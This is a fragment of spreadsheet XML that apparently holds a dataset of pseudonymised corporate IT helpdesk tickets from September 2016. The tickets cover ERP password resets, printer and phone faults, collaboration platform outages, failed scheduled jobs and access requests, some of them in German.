    <t xml:space="preserve">please review the attached inwarehouse_tools, both of which are the same. the one without the tax is the one the customer received.  the second one with the tax is one that i sent to myself and is billing tax. i spoke with cegtcily in the tax dept. and she is stating that she has a ticket in for this issue where tax is not printing but is calculating in erp.  please look into this issues as quickly as possible as customers are now questioning the billing difference and it is becoming an issue for our customers. </t>
  </si>
  <si>
    <t>canadian customer inwarehouse_tools are not printing the tax amount on the inwarehouse_tools</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: gkzedilm.tkpfumeb@gmail.com
user gkzedilm tkpfumeb [jesjnlyenm] can't log into his aplications - engineering_tool and netweaver.
netweaver reports "too many incorrect logins" and engineering_engineering_tools "unable to contact server".
i suspect the user is blocked from these accounts due to too many incorrect logins.
the user did not recently changed password.
</t>
  </si>
  <si>
    <t xml:space="preserve">telefon defekt </t>
  </si>
  <si>
    <t>gigaset m2 mit der durchwahl 479_x000D_
akku hÃ¤lt nicht mehr lÃ¤nger wie 1 tag_x000D_
kann am display nicht mehr erkennen._x000D_
clip defekt</t>
  </si>
  <si>
    <t>ptvdxwla tlevwmzo</t>
  </si>
  <si>
    <t xml:space="preserve">unable to log in to erp </t>
  </si>
  <si>
    <t>unable to log in to erp</t>
  </si>
  <si>
    <t>uerghtyi erzatqpy</t>
  </si>
  <si>
    <t>user jeshyensky can't log into accounts</t>
  </si>
  <si>
    <t>password reset for mii</t>
  </si>
  <si>
    <t xml:space="preserve">password reset for mii_x000D_
</t>
  </si>
  <si>
    <t>mktwyzhx zhcenpvt</t>
  </si>
  <si>
    <t>my phone #, erp, "name or password is incorrect (repeat logon)", cannot log into erp systems.</t>
  </si>
  <si>
    <t>i have access to a few systems on erp but i am not able to log into the system. i have entered "wynhtydf" as my username and for the password i enter the same password that successfully logs me into password_management_tool password manager. i have unlocked the systems which i have access to in password_management_tool password manager and still cannot log in.  please see screenshot "erp error screenshot" for the error message and "password_management_tool password unlock" for list of erp systems i cannot access.</t>
  </si>
  <si>
    <t xml:space="preserve">sfb : personal certificate error </t>
  </si>
  <si>
    <t>my password is locked when i am trying to go into the erp newweaver portal.</t>
  </si>
  <si>
    <t>name:nmpworvu upgtrvnj
language:
browser:microsoft internet explorer
email:nmpworvu.upgtrvnj@gmail.com
customer number:
telephone:
summary:my password is locked when i am trying to go into the erp newweaver portal.</t>
  </si>
  <si>
    <t>unable to log in to mii</t>
  </si>
  <si>
    <t>dxgplzyt jutksefr</t>
  </si>
  <si>
    <t>loading esprit cam software on laptop....</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: jvshydix.rzpmnylt@gmail.com_x000D_
_x000D_
twimc_x000D_
_x000D_
i have the opportstorage_product, along with ruben castro of company, to receive free downloads of esprit cam software through a local authorized esprit dealer we are teaming with on a project locally. i was wondering what we needed to do in order to receive administrative approval? </t>
  </si>
  <si>
    <t>cannot connect to outlook from home</t>
  </si>
  <si>
    <t>fecdszvm ovtsxqnl</t>
  </si>
  <si>
    <t>prpf instead of prir</t>
  </si>
  <si>
    <t>for usa location and order 226033677, operation 10_x000D_
_x000D_
mii showed the order in prpf status, looking at erp, order was partially confirmed followed by "automatic pause"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t>
  </si>
  <si>
    <t>qipzctgs wjhtbpfr - need network account so he can get email and etime</t>
  </si>
  <si>
    <t>qipzctgs wjhtbpfr is onsite in usa at baker. he needs to have access to use etime and email. i'm told he needs a network account so we can get all this et up. this is urgent. need by 9/26/16</t>
  </si>
  <si>
    <t>i cannot access the discount tool</t>
  </si>
  <si>
    <t>when trying to enter a discount i get the following message:_x000D_
_x000D_
error occured.  contact pricing_x000D_
_x000D_
i have a new laptop.  i don't think it has been configured yet.</t>
  </si>
  <si>
    <t>nbcyhjxg czawdryt</t>
  </si>
  <si>
    <t>confirm threshold qty</t>
  </si>
  <si>
    <t>if i set confirm qty threshold to 100, it gives me error even when i try to confirm order planned qty (default). _x000D_
for example - if order is 20 pieces and confirmation screen by default shows 20 pieces, it will give me a warning if threshold is set to 100. i believe i should get this warning for confirming pieces higher than threshold. (threshold should check if pieces entered are equal or less than planned =&gt; no warning)</t>
  </si>
  <si>
    <t xml:space="preserve">performance improvement/tuning  </t>
  </si>
  <si>
    <t xml:space="preserve">performance improvement/tuning for machine summary &amp; load list_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">erp SID_34 login issue - terhyury portelance </t>
  </si>
  <si>
    <t>name:chhyene dolhyt
language:
browser:microsoft internet explorer
email:ianqdhmu.camoysfq@gmail.com
customer number:
telephone:
summary:i am currently on the phone with our salesman terhyury portelance and he needs his password reset in erp.  can you help.  his user id is porteta</t>
  </si>
  <si>
    <t>ianqdhmu camoysfq</t>
  </si>
  <si>
    <t>vmsliazh ltksxmyv causing high cpu utilization on server HostName_341</t>
  </si>
  <si>
    <t>we've noticed that the cpu utilization on the mii uacyltoe hxgaycze server, HostName_341, has been hovering around 50% - 70% with occasional spikes to 100%.  we have stopped all of the background jobs and even rebooted the server but the utilization is still very high.   attached is a screen shot of the task manager processes showing the sql process.   is there anything that you can check on this server to see what is consuming so much of the system resources?   there are only a few users who are currently using the uacyltoe hxgaycze system at this time</t>
  </si>
  <si>
    <t>outlook addin : crm not showing up.</t>
  </si>
  <si>
    <t>need acces to erp</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: umdyvbxo.qwzstijr@gmail.com
hello,
1. erp user id having issue: rudras
2. erp system (SID_34, SID_37,..., SID_1,...SID_21,..., SID_51, portal): SID_34
3. error screenshot:
i am unable to open few transaction codes,
and few codes will not allow me to change anything in the material.
[cid:image001.png@01SID_35348.7dfea860]
4. su53 screenshot:
[cid:image004.png@01SID_35349.1758c680]
5. business justification: i am working for usa and will do the same work as schtrtgoyht (schhdgtmips).
6. reference / mirror user id with same job title having access to it: schhdgtmips
</t>
  </si>
  <si>
    <t>unable to print expense report</t>
  </si>
  <si>
    <t xml:space="preserve">from: microsoft on behalf of company inc. [mailto:msonlineservicesteam@microsoftonline.com] 
sent: tuesday, september 20, 2016 6:58 pm
to: nwfodmhc exurcwkm
cc: tiyhum kuyiomar
subject: amar - request to reset microsoft online services password for goyvcped.sxbgiajh@gmail.com
importance: high
    request to reset user's password   
   the following user in your organization has requested a password reset be performed for their account: 
â€¢ goyvcped.sxbgiajh@gmail.com 
â€¢ first name: michbhuael 
â€¢ last name: laugdghjhlin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</si>
  <si>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goyvcped sxbgiajh</t>
  </si>
  <si>
    <t>can not create delivery for sto 4908059474</t>
  </si>
  <si>
    <t xml:space="preserve">i had company south_amerirtca look at the sto and someone at our facility and nobody is able to help me. </t>
  </si>
  <si>
    <t>knabwtox ksbzjdrn</t>
  </si>
  <si>
    <t>create co object for aacount 81469651- plant_248 to do gr - delivery 9168437599- sto 4907248786</t>
  </si>
  <si>
    <t xml:space="preserve">is not possible to do gr for delivery 9168437599 - sto 5018359897_x000D_
error below _x000D_
 account 81469651 requires an assignment to a co object_x000D_
message no. ki235_x000D_
_x000D_
diagnosis_x000D_
you have not defined a co account assignment for an account that is relevant to cost accounting._x000D_
_x000D_
system response_x000D_
account 81469651 is defined as a cost element._x000D_
this means that you must always specify a co account assignment._x000D_
_x000D_
procedure_x000D_
enter one of the following co account assignments_x000D_
_x000D_
order_x000D_
cost center / cost center/ activity type_x000D_
sales order item (for a project or cost relevant)_x000D_
project / wbs element_x000D_
cost object (process manufacturing)_x000D_
network/ network activities_x000D_
business process_x000D_
profitability segment_x000D_
real estate object_x000D_
the posting row affected is 1111111112, account 81469651_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">application "hana sidecar prod" on node "HostName_1297" is in a warning state. cpu load is high for that service. </t>
  </si>
  <si>
    <t>opzuciql muedfkhz</t>
  </si>
  <si>
    <t>vip 2 // erp SID_21 account unlock for user vvshyuwb1</t>
  </si>
  <si>
    <t xml:space="preserve">vip 2 // erp SID_21 account unlock for user vvshyuwb1
from: stefyty parkeyhrt 
sent: tuesday, september 20, 2016 9:31 pm
to: nwfodmhc exurcwkm
subject: amar fw: need unlock my userid: vvshyuwb1
importance: high
please assist user aerp. he is a consultant on a project.
</t>
  </si>
  <si>
    <t>esntuago kwxrdhuv</t>
  </si>
  <si>
    <t>vip 2 // unable to access collaboration_platform</t>
  </si>
  <si>
    <t xml:space="preserve">
name:brandhyht s muthdyrta
language:
browser:microsoft internet explorer
email:zanivrec.capbfhur@gmail.com
customer number:
telephone:
summary:collaboration_platform problem - when i try to access 
error
the server is busy now. try again later
correlation id::1e9da59d-50a2-3000-1604-10e20332f108
date and time: 9/20/2016 5:49:42 am
</t>
  </si>
  <si>
    <t>tuyasvzc zmhorudq</t>
  </si>
  <si>
    <t>customer master can not be changed.</t>
  </si>
  <si>
    <t xml:space="preserve">hello_x000D_
_x000D_
customer â„–81851756_x000D_
it changed, but the data is not updated._x000D_
_x000D_
from the registration of the ship to only, it has registered a sold to like._x000D_
</t>
  </si>
  <si>
    <t>missing  ewa reports for SID_51.</t>
  </si>
  <si>
    <t>i have not received the SID_51 ewa reports for 09/13 and  09/20.  please fix.</t>
  </si>
  <si>
    <t>drmusvny yvsmtgid</t>
  </si>
  <si>
    <t>qcwoejsk cowdbfkn</t>
  </si>
  <si>
    <t>please provide vpn access to ngfedxrp oirmgqcs, hodgek, approved by phjencfg kwtcyazx and andhtyju volkhd</t>
  </si>
  <si>
    <t>pc is job_scheduler owned, company imaged laptop, pc name is job_schedulerbhml70001</t>
  </si>
  <si>
    <t>error while qualify a new leadin  ms dynamics crm</t>
  </si>
  <si>
    <t xml:space="preserve">hi,_x000D_
i was working in crm and tried to qualify a new lead. when i did i got the below error. please advise._x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1394 failed in job_scheduler at: 09/20/2016 10:55:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1394 failed in job_scheduler at: 09/20/2016 10:55:00</t>
  </si>
  <si>
    <t>unable to click on claims page of insurance website</t>
  </si>
  <si>
    <t>ahuztyxg zlrwshfb</t>
  </si>
  <si>
    <t xml:space="preserve"> unable to find any po pending with me</t>
  </si>
  <si>
    <t xml:space="preserve">hello,_x000D_
_x000D_
am unable to find any po pending with me. pl find screen shot, upon going thro' SID_34._x000D_
kindly do the needfufl._x000D_
</t>
  </si>
  <si>
    <t>jmfvwrek pqwehmzg</t>
  </si>
  <si>
    <t>password reset - erp</t>
  </si>
  <si>
    <t xml:space="preserve">from: sanmhty mahatndhyua 
sent: tuesday, september 20, 2016 12:21 pm
to: nwfodmhc exurcwkm &lt;nwfodmhc.exurcwkm@gmail.com&gt;
subject: sonia - fw: reminder for approval of requisition 49001312
hi,
please reset erp password as i do not use regularly and have to clear below mentioned pr urgently.
</t>
  </si>
  <si>
    <t>slfxjznk hmspexor</t>
  </si>
  <si>
    <t>unable to login to vcenter HostName_795</t>
  </si>
  <si>
    <t>unable to login to vcenter HostName_795.</t>
  </si>
  <si>
    <t xml:space="preserve">job kk_uacyltoe hxgaycze failed in job_scheduler at: 09/20/2016 10:15:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job kk_uacyltoe hxgaycze failed in job_scheduler at: 09/20/2016 10:15:00</t>
  </si>
  <si>
    <t>discount form</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: sqlcuhep.railgnfb@gmail.com_x000D_
_x000D_
hello,_x000D_
_x000D_
i am not able to use the discount request form. following window opens once i click new request. please help!_x000D_
_x000D_
[cid:image001.jpg@01SID_35326.c4793b10]_x000D_
_x000D_
_x000D_
best </t>
  </si>
  <si>
    <t>replication error : domain controller HostName_752</t>
  </si>
  <si>
    <t>we see event ld 1127, 1084 and 2108. which is related to dc replication issue. hence will have to reboot the server.</t>
  </si>
  <si>
    <t>rutkswpn fouwyqma</t>
  </si>
  <si>
    <t>zredeploy created sto has future committed date</t>
  </si>
  <si>
    <t xml:space="preserve">sto created by zredeploy has future committed date in it even when stock are available at the sender warehouse. </t>
  </si>
  <si>
    <t>require new driver for local printer.</t>
  </si>
  <si>
    <t>am not able to save a spreadsheet into team documents</t>
  </si>
  <si>
    <t xml:space="preserve">need to be able to save several times a day into team documents - can't attach screenshot   - </t>
  </si>
  <si>
    <t>screenshot</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: gbirhjat.fptbrhwv@gmail.com
please look at this this error message and let me know how to fix it.
[cid:image001.jpg@01SID_35324.a628ae40]
marjnstyk r jsytis
senior sales engineer
gbirhjat.fptbrhwv@gmail.com
[company_horz_logo]
</t>
  </si>
  <si>
    <t>archiving_tool server - optical archive documents</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: seltxfkw.ontgxqwy@gmail.com_x000D_
_x000D_
hello,_x000D_
_x000D_
our local application can't  download files from archiving_tool server because the content repository address is not returning a valid response._x000D_
archiving_tool addreess we are tring to call is:_x000D_
_x000D_
_x000D_
_x000D_
and we obtain the following answer:_x000D_
_x000D_
_x000D_
http status 404 - /procache/cscache_x000D_
_x000D_
--------------------------------------------------------------------------------_x000D_
_x000D_
type status report_x000D_
_x000D_
message /procache/cscache_x000D_
_x000D_
description the requested resource is not available._x000D_
_x000D_
i kindly ask you to check web service configuration to enable comunication on 8080 port._x000D_
trying to ping archiving_tool-app the address is solved as  10.2.9.149._x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>seltxfkw ontgxqwy</t>
  </si>
  <si>
    <t>name:mfeyouli ndobtzpw
language:
browser:microsoft internet explorer
email:mfeyouli.ndobtzpw@gmail.com
customer number:
telephone:
summary:please reset SID_34 erp account for haunm</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_2063b failed in job_scheduler at: 09/20/2016 09:37:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_2063b failed in job_scheduler at: 09/20/2016 09:37:00</t>
  </si>
  <si>
    <t>outlook does not open</t>
  </si>
  <si>
    <t>ciszbkoh xozqjavr</t>
  </si>
  <si>
    <t>the shop_floor_app is reporting a : down status on, lcosm005. please investigate</t>
  </si>
  <si>
    <t xml:space="preserve">observing alert in monitoring_tool since 09:04 am on 09/20 et:_x000D_
the shop_floor_app is reporting a : down status on, lcosm005. we are able to ping the server._x000D_
_x000D_
c:\users\karansb&gt;ping lcosm005_x000D_
_x000D_
pinging lcosm005.company.company.com [57.68.38.7412] with 32 bytes of data:_x000D_
reply from 57.68.38.7412: bytes=32 time=230ms ttl=124_x000D_
reply from 57.68.38.7412: bytes=32 time=230ms ttl=124_x000D_
reply from 57.68.38.7412: bytes=32 time=230ms ttl=124_x000D_
reply from 57.68.38.7412: bytes=32 time=230ms ttl=124_x000D_
_x000D_
ping statistics for 57.68.38.7412:_x000D_
    packets: sent = 4, received = 4, lost = 0 (0% loss),_x000D_
approximate round trip times in milli-seconds:_x000D_
    minimum = 230ms, maximum = 230ms, average = 230ms_x000D_
_x000D_
c:\users\karansb&gt;_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>clients laptop crashed and will not boot</t>
  </si>
  <si>
    <t>onvpjxei uiolhpjq</t>
  </si>
  <si>
    <t>in plant_228 EU_tool is not working since friday</t>
  </si>
  <si>
    <t xml:space="preserve">we are already in contact with the EU_tool-system in india. we need each imaginal help. since friday 09-20-2016 we have big problems with EU_tool since friday 09-20-2016.  today EU_tool we have no chance to confirm our operations, to sign our errors,  to set our stockmanagement etc. this is a very great hinderance for plant_228. </t>
  </si>
  <si>
    <t>replace monitor in cell 3 with one that tiyhum kuyiomar sent.</t>
  </si>
  <si>
    <t>vip 2: collaboration_platform access problem</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: kzbuhixt.zjdmoahr@gmail.com
i'm not able to log into collaboration_platform or collaboration_platform.  i have restarted my pc multiple times and tried to log in but cannot do so.  please advise!  see screen shots below.  -
[cid:image001.png@01SID_3531f.1b49eff0]
[cid:image002.png@01SID_3531f.1b49eff0]
sethdyr hdtyr
assistant general counsel â€“ compliance and real estate
kzbuhixt.zjdmoahr@gmail.com&lt;mailto:kzbuhixt.zjdmoahr@gmail.com&gt;
</t>
  </si>
  <si>
    <t>kzbuhixt zjdmoahr</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: rxqtvanc.kthqwxvb@gmail.com
company collaboration_platform is down.  cannot access the hub.  keep getting this message.
[cid:image001.png@01SID_3531e.f83adec0]
rxqtvanc kthqwxvb
region controller - amerirtcas
email: rxqtvanc.kthqwxvb@gmail.com&lt;mailto:rxqtvanc.kthqwxvb@gmail.com&gt;
</t>
  </si>
  <si>
    <t>rxqtvanc kthqwxvb</t>
  </si>
  <si>
    <t>replace monitor across from yolktfas fyoxqgvh. a different cable is needed.</t>
  </si>
  <si>
    <t>i can not access the company collaboration_platform server in usa.</t>
  </si>
  <si>
    <t>i get an error message indicating "the server is busy right now. try again later".  please see the attachment to review the message.  if you need additional information, i can be reached at (</t>
  </si>
  <si>
    <t>vip2: the hub / collaboration_platform is down</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: lpoebzsc.grknswyo@gmail.com
i am unable to access the hub, collaboration_platform, and collaboration_platform.  i receive the below error.
[cid:image001.png@01SID_3531e.66b94450]
best,
lpoebzsc grknswyo
executive assistant tofinance_vip1,
     vice president and chief financial officer
lpoebzsc.grknswyo@gmail.com&lt;mailto:lpoebzsc.grknswyo@gmail.com&gt;
</t>
  </si>
  <si>
    <t>cursors moving in the opposite direction.</t>
  </si>
  <si>
    <t xml:space="preserve">cursors moving in the opposite direction._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>erp SID_34 account locked.</t>
  </si>
  <si>
    <t xml:space="preserve">erp SID_34 account locked. </t>
  </si>
  <si>
    <t>hzetqwba tmsbnfkh</t>
  </si>
  <si>
    <t>erp password reset for user : lombab&lt;vrcqhnty ajomhkfv&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">
summary:operator does not know their mii erp username or password</t>
  </si>
  <si>
    <t>pxwhlnse hjfzvsoa</t>
  </si>
  <si>
    <t>inc1552016 - ticket update</t>
  </si>
  <si>
    <t>server is busy on collaboration_platform</t>
  </si>
  <si>
    <t>ethwnzfb roqytnjk</t>
  </si>
  <si>
    <t>2 active content versions</t>
  </si>
  <si>
    <t>we can't open and save 71844588 nxa as there are two epj active content versions._x000D_
_x000D_
i've tried using /dscsag/dms_kpro_double_repair without success._x000D_
_x000D_
according to bob ..."there is a report in erp called rsir_content_unmarkhty_prelim that should resolve the issue with multiple active content versions"</t>
  </si>
  <si>
    <t>vip 2 printer drivers not installing</t>
  </si>
  <si>
    <t>unsuccessful installing drivers for network printers (tc48 &amp; tc19); attempts result in "error processing request."</t>
  </si>
  <si>
    <t>recjqtbg xcyuetmj</t>
  </si>
  <si>
    <t>company.collaboration_platform.com : application status is down from 8:47 am et 09/20.</t>
  </si>
  <si>
    <t>drucker em95 defekt</t>
  </si>
  <si>
    <t>drucker em95 druckt nicht mehr irgend ein fehler im papiereinzug nach anweisung fehlermeldung nachgeschaut und nichts gefunden?</t>
  </si>
  <si>
    <t>error message and different views</t>
  </si>
  <si>
    <t>during working on crm i' m  getting exit pop-ups - i attached screens</t>
  </si>
  <si>
    <t>wk25 erp drucker druckt nicht sauber. seiten wedgrtyh ahsnwtey.</t>
  </si>
  <si>
    <t>vip 2 // unable to sign in to one note as password is not synching</t>
  </si>
  <si>
    <t>account auf iphone lÃ¶schen und neu anlegen.</t>
  </si>
  <si>
    <t>da durch den zugriff per iphone auf den mail account das gesamte konto gesperrt wurde, _x000D_
muss der account auf dem iphone gelÃ¶scht und neu anlegt werden.</t>
  </si>
  <si>
    <t>passwort muÃŸ nochmals zurÃ¼ckgestzt werden.</t>
  </si>
  <si>
    <t>vermutlich hat der zugriff mit dem iphone das konto wieder gesperrt._x000D_
passwort muÃŸ nochmals zurÃ¼ckgestzt werden. /jxphgfmb gjbtuwek</t>
  </si>
  <si>
    <t>xgasvhed hesuolmf</t>
  </si>
  <si>
    <t>user is unable to open presentation from outlook client.</t>
  </si>
  <si>
    <t>archive emails</t>
  </si>
  <si>
    <t>old e-mails - they have been archived somewhere? i need to access - how do i get there?</t>
  </si>
  <si>
    <t>fgljepar xpsarwiz</t>
  </si>
  <si>
    <t>inc1552901: packet drops in india -1111460708</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: mnlazfsr.mtqrkhnx@gmail.com
from: ramdntythanjeshkurtyar  [mailto:radjkanjesh.sidrthy@telecom_vendor_1corp.com]
sent: tuesday, september 20, 2016 6:06 am
to: spxqmiry zpwgoqju; sadjuetha shwyhdtu
cc: datacenter; network; sot.south@telecom_vendor_1corp.com
subject: re: packet drops 
dear vignbhyesh,
we are experiencing internal fiber media issue outage.
team is working on for restoration. etr is 4.30 pm.
warm </t>
  </si>
  <si>
    <t>windows update kb4283716 makes logon the telephony_software imposible ( do not assign to telephony_software admins)</t>
  </si>
  <si>
    <t xml:space="preserve">when users delete the update, it will run the update every day. the update makes it impossible to logon to the telephony_software phone system._x000D_
therefor we need to have a easy way to remove the update or avoid the update to be installed._x000D_
_x000D_
this is a global issue although mostly seen within europe._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>GRP_65</t>
  </si>
  <si>
    <t>engineering tool related issue</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: zdgxtfqs.tibmhxcs@gmail.com_x000D_
_x000D_
hello,_x000D_
please refer the below screen shot for engineering tool related issue._x000D_
after installing software update, i am unable make new customer entries. please note that option button for new customer entry  is not appearing._x000D_
_x000D_
kindly resolve the problem at the earliest._x000D_
_x000D_
[cid:image001.jpg@01SID_35364.8a8deca0]_x000D_
_x000D_
best </t>
  </si>
  <si>
    <t>one note issue</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: lhejbwkc.xbmyvnqf@gmail.com_x000D_
_x000D_
hi_x000D_
_x000D_
when a one note workbook is shared with me i can only open the web view and get below error message:_x000D_
_x000D_
[cid:image001.png@01SID_35346.ecc0c320]_x000D_
_x000D_
according to the owner i have permission to open it._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>problem with hagemeyer oci shop in SID_34 purchasing</t>
  </si>
  <si>
    <t xml:space="preserve">as discussed_x000D_
</t>
  </si>
  <si>
    <t>cvd  amount wrongly generated</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: ikerxqwz.prkyuitl@gmail.com_x000D_
_x000D_
hello,_x000D_
_x000D_
vide below mentioned inwarehouse_tool ,  customer   has returned   material  without excise papers ._x000D_
_x000D_
we find  system has debited  cvd amount and  also  credited  expenses ._x000D_
_x000D_
please review   and rectify accordingly_x000D_
_x000D_
_x000D_
[cid:image001.png@01SID_3535e.501961e0]_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>reset password in SID_50 - user zigioachstyac</t>
  </si>
  <si>
    <t>bitte im laufwerk germany unter m:\berechnungsprogramdntym die datei db_stp vom datum 19.09.2016 wiederherstellen.</t>
  </si>
  <si>
    <t>bitte im laufwerk germany unter m:\berechnungsprogramdntym die sicherungsdatei db_stp vom datum 19.09.2016 wiederherstellen. benÃ¶tigen wir um produktionsinfos raus zu geben.</t>
  </si>
  <si>
    <t>not able to build distributor_tool project in local system</t>
  </si>
  <si>
    <t>not able to build distributor_tool project in local system._x000D_
when i login(vvhstyap) with my details, i m not able to build project in my local system. but, when my colleague log's in with his login details, he's able to build the project in my local system_x000D_
so kindly look into this on priority as it is stopping my development activities._x000D_
you can use venktyamk12 login name as a reference to map the roles to me.</t>
  </si>
  <si>
    <t>awb 0276036761 / sin - jnb</t>
  </si>
  <si>
    <t xml:space="preserve">it help,_x000D_
_x000D_
for dn# 9169292812, the post code is 1518 on the shipping label from kis as below. _x000D_
but the correct post code should be 1478 as cec confirms it's same in customer master. _x000D_
copy the screens below. _x000D_
_x000D_
can you check what caused the wrong post code on the label?  </t>
  </si>
  <si>
    <t>rma process fault in erp</t>
  </si>
  <si>
    <t xml:space="preserve">hello,_x000D_
_x000D_
_x000D_
could you please resolve the following issue immediately?_x000D_
_x000D_
issue: trying to rma with using "zlx5" which is the erp process for returning goods and there are the below screen shot shows fault._x000D_
_x000D_
 _x000D_
_x000D_
 _x000D_
_x000D_
 _x000D_
_x000D_
best </t>
  </si>
  <si>
    <t>engineering_tool update</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: xwertljy.zrmlhkyq@gmail.com_x000D_
_x000D_
hello,_x000D_
_x000D_
_x000D_
new customer addition button is missing please update, matheywter urgent._x000D_
_x000D_
[cid:image001.jpg@01SID_35359.4f8d67d0]_x000D_
</t>
  </si>
  <si>
    <t>zugriff auf verlauf m:\skv-alicona.</t>
  </si>
  <si>
    <t xml:space="preserve">hallo ,
folgende mitarbeiter benÃ¶tigen zugriff auf unten stehen verlauf
m:\skv-alicona
mitarbeiter: rhaycqjg arcgonvy (kudhnyuhnm), nfybpxdg yjtdkfuo (kesrgtyu), lxfnwyuv bqmjyprz (rockehsty) hgrvubzo wgyhktic (koiergyvh) und hnyeajrw ctxjsolz (simekdty)
vergleichsmitarbeiter: h. beckshtywsnh ( beckshtyw)
</t>
  </si>
  <si>
    <t>hqyfebtd pkmyrdga</t>
  </si>
  <si>
    <t>erp user profile for pthsqroz moedyanvess</t>
  </si>
  <si>
    <t>i need to complete a npc task in erp, but i get error messages, see attachement._x000D_
_x000D_
please cancel chg1145533 as this got created by mistake.</t>
  </si>
  <si>
    <t>juqpaxry ulqfbiog</t>
  </si>
  <si>
    <t>HostName_1132: web tier (epmsystem2) &amp; java server (epmsystem2) are down.</t>
  </si>
  <si>
    <t xml:space="preserve">HostName_1132 : oracle finance_app financial management - web tier (epmsystem2) - service monitor(unknown)_x000D_
HostName_1132 : oracle finance_app financial management - java server (epmsystem2) - service monitor(unknown)_x000D_
</t>
  </si>
  <si>
    <t>drucker em26 geht nicht mehr</t>
  </si>
  <si>
    <t>drucker em26 geht nicht mehr trotz mehrere druckauftrÃ¤ge_x000D_
kein anderer drucker instaliert _x000D_
bitte drucker em47 auch instalieren</t>
  </si>
  <si>
    <t>unable to launch erp</t>
  </si>
  <si>
    <t>sqgvrmhy eypjuowq</t>
  </si>
  <si>
    <t>need access to emails of qiscgfjv.kxfdsijv@gmail.com for a year.</t>
  </si>
  <si>
    <t xml:space="preserve">need access to emails of qiscgfjv.kxfdsijv@gmail.com for a year.
ph: </t>
  </si>
  <si>
    <t xml:space="preserve">rickjdt has confirmed that the password is working after reset. </t>
  </si>
  <si>
    <t>bitte um freigabe von m:\skv-alicona.</t>
  </si>
  <si>
    <t>bitte um freigabe von m:\skv-alicona. /hnyeajrw ctxjsolz</t>
  </si>
  <si>
    <t>brauche freigabe fÃ¼r m:\skv-alicona.</t>
  </si>
  <si>
    <t>brauche freigabe fÃ¼r m:\skv-alicona. /hgrvubzo wgyhktic</t>
  </si>
  <si>
    <t>hgrvubzo wgyhktic</t>
  </si>
  <si>
    <t>ylhukdof fiymhdnw</t>
  </si>
  <si>
    <t xml:space="preserve">job pp_EU_tool_netch_ap1 failed in job_scheduler at: 09/20/2016 05:40:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job pp_EU_tool_netch_ap1 failed in job_scheduler at: 09/20/2016 05:40:00</t>
  </si>
  <si>
    <t>brauche freigabe fÃ¼r m:\skv-alicona. /lxfnwyuv bqmjyprz</t>
  </si>
  <si>
    <t>bitte freigabe fÃ¼r m:\skv-alicona einrichten.</t>
  </si>
  <si>
    <t>bitte freigabe fÃ¼r m:\skv-alicona einrichten. /nfybpxdg yjtdkfuo</t>
  </si>
  <si>
    <t>nfybpxdg yjtdkfuo</t>
  </si>
  <si>
    <t>bitte freigabe fÃ¼r m:\skv-alicona einrichten. /rhaycqjg arcgonvy</t>
  </si>
  <si>
    <t>www.company.com web site - engineering_tool "product selector" link reported as not working</t>
  </si>
  <si>
    <t>mikhghytr kinsella has reported that the  "product selector" link does not work www.company.com home page_x000D_
it allows selection as far as material type and then goes to a contacts page</t>
  </si>
  <si>
    <t>jyervicn ckujvgri</t>
  </si>
  <si>
    <t>erp &amp; other internet service are slow for all users</t>
  </si>
  <si>
    <t>ainw8911993 new india patching_antivirus_sw desktop server is down</t>
  </si>
  <si>
    <t>this pc is offline since 30th aug.</t>
  </si>
  <si>
    <t>unable to download engineering_tools .</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: vkezwolt.fgnqzeai@gmail.com_x000D_
_x000D_
kindly look into , unable to extract and open engineering_tool files._x000D_
_x000D_
please revert back with top priority and same case studies are required to be discussed._x000D_
_x000D_
get the below error._x000D_
_x000D_
_x000D_
[cid:image004.jpg@01SID_3534d.2ab61030]_x000D_
_x000D_
best </t>
  </si>
  <si>
    <t xml:space="preserve">job Job_3182 failed in job_scheduler at: 09/20/2016 05:00:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_3182 failed in job_scheduler at: 09/20/2016 05:00:00</t>
  </si>
  <si>
    <t>bitte die drucker umstellen und konfigurieren</t>
  </si>
  <si>
    <t>bitte die drucker umstellen und konfigurieren /vaigycet jtgmpdcr</t>
  </si>
  <si>
    <t>vaigycet jtgmpdcr</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: phqwmniy.kjucgqom@gmail.com
hello,
while route card release error message appearing  and route card not get printed:
[cid:image001.jpg@01SID_3534a.f3add890]
required help in resolving the issue,
[cid:image002.png@01SID_3534a.f3add890]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</si>
  <si>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erp net weaver funktioniert nicht. pc: empw7000230</t>
  </si>
  <si>
    <t xml:space="preserve">telefon defekt. gigaset charger for sl3 professional. chargeur posrt poste 8010 sl3; </t>
  </si>
  <si>
